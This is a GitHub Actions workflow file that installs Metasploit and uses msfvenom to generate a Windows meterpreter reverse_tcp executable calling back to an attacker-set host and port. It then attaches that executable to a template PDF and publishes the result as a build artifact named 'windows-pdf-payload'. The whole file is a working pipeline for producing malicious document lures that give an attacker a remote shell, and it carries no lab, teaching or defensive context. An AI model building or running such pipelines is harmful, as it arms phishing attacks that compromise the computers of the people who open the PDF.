name: Embed Windows Payload in PDF

on: [workflow_dispatch]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Install mupdf-tools and Poppler Utils
        run: sudo apt-get update && sudo apt-get install -y mupdf-tools poppler-utils

      - name: Install Metasploit Framework
        run: |
          curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
          chmod 755 msfinstall
          ./msfinstall

      - name: Generate Windows payload with msfvenom
        run: |
          msfvenom -p windows/meterpreter/reverse_tcp LHOST="${{ secrets.LHOST }}" LPORT="${{ secrets.LPORT }}" -f exe -o shell.exe

      - name: Embed payload in PDF
        run: pdfattach --attach shell.exe template.pdf payload.pdf

      - name: Upload PDF artifact
        uses: actions/upload-artifact@v4
        with:
          name: windows-pdf-payload
          path: payload.pdf
